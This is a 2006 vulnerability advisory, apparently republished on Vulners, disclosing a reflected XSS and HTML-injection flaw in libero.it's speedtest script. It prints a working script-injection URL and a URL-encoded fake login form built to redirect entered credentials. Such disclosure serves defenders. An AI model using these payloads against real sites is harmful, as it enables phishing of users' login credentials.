Vulners
Lucene search
liberoXSS.txt
🗓️ 06 May 2006 00:00:00Reported by Davide DenicoloType 
packetstorm🔗 packetstormsecurity.com👁 39 Views
`--Security Report--
Advisory: libero.it XSS vulnerability - HTML injection
---
Author: Davide Denicolo
---
Date: 28/04/06
---
Contact: davide<at>securityinfos.com
---
Vendor: ItaliaOnLine S.r.l (http://www.libero.it)
Service: Web
Level: Low
---
Description:
Libero.it is a Web portal of big Italian ISP: ItaliaOnLine offering
dial-up,Broadband and talk services.
A Broadband service called "Libero speedtest" is a simple "Bandwidth Speed
Test";
A java applet test, send Bandwidth information to perl script
(print_result_spt.pl) in the GET request and
this perl script simply put parameter in the page as HTML;
an attacker can exploit the vulnerable script to have arbitrary script code
executed in the browser or injects html form so redirect a login
authentication to another web application;
this is a normal HTTP URL:
http://assistenza.libero.it/cgi-bin/print_result_spt.pl?down=868.02&up=220.5
3&tdown=18875&tup=74297&size=2048.0&t=0
this is a XSS URL:
http://assistenza.libero.it/cgi-bin/print_result_spt.pl?down=4742.11&up=<scr
ipt>alert('ciao')</script>&tdown=3455&tup=5107&size=2048.0&t=0
and this is an HTML form :
<table border="0" width="32%">
<form method="POST" action="http://127.0.0.1">
<tr>
<td width="19%">
<input type="text" name="T2"
style="font-size:7pt">
</td>
<td width="81%">
<select size="1" name="D1"
style="font-size:8pt">
<option
value="1">@libero.it</option>
<option
value="2">@inwind.it</option>
<option value="4">@iol.it</option>
<option value="66">@blu.it</option>
</select>
</td>
</tr>
<tr>
<td width="19%">
<input type="password" name="T3"
style="font-size:7pt">
</td>
<td>
<p>
<input tabindex="4" value="Entra"
name="Act_Login" src="http://www.libero.it/i05/entra_hp.gif" alt="Entra"
border="0" height="22" type="image" width="44">
</p>
</td>
</tr>
</form>
</table>
and this is previous form injects in the request:
http://assistenza.libero.it/cgi-bin/print_result_spt.pl?down=4742.11&up=<tab
le%20border="0"%20width="32%"><form%20method="POST"%20action="http://127.0.0
.1"><tr><td%20width="19%"><input%20type="text"%20name="T2"%20style="font-siz
e:7pt"></td><td%20width="81%"><select%20size="1"%20name="D1"%20style="font-s
ize:8pt"><option%20value="1">@libero.it</option><option%20value="2">@inwind.
it</option><option%20value="4">@iol.it</option><option%20value="66">@blu.it<
/option></select></td></tr><tr><td%20width="19%"><input%20type="password"%20
name="T3"%20style="font-size:7pt"></td><td><p><input%20tabindex="4"%20value=
"Entra"%20name="Act_Login"%20src="http://www.libero.it/i05/entra_hp.gif"%20a
lt="Entra"%20border="0"%20height="22"%20type="image"%20width="44"></p></td><
/tr></form></table>&tdown=3455&tup=5107&size=2048.0&t=0
--
Timeline:
* 2/05/2006: Vulnerability found.
* 2/05/2006: Unable to contact vendor
--
For more information, please send question to: davide<at>secutityinfos.com
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 May 2006 00:00Current
7.4High risk
Vulners AI Score7.4